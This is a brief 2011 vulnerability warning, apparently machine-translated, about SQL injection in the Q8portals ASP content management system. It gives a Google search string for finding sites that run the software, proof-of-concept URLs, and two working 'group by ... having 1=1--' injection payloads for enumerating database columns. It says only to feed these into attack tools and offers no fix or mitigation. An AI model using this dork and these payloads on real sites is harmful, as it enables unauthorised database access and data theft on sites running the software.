Q8portals SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-05-15T00:00:00
ID MYHACK58:62201130470
Type myhack58
Reporter 佚名
Modified 2011-05-15T00:00:00

Description

Vulnerability description: Q8portals is a foreign of asp content management system, due to design flaws, leading tosql injectionvulnerability

Vulnerability type: sql injection, ascript injection, blind injection, injection vulnerabilities

Google keywords: intext:Powered by: q8portals.com

Vulnerability testing: directly throw them into the relevant tools......

[P0C]: http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION]

[P0C]: http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION]

http://www.xxx.net/portal/articles_en.asp?id=-4%20group+by+ARTICLES. ARTICLE_ID,ARTICLES. ARTICLE_TITLE_AR,ARTICLES. ARTICLE_DESC_AR+having%2 0 1=1--

http://www.xxx.net/portal/contents_en.asp?id=4%20group+by+CONTENTS. CONTENT_ID,CONTENTS. CONTENT_NAME_AR,CONTENTS. CONTENT_DESC_AR--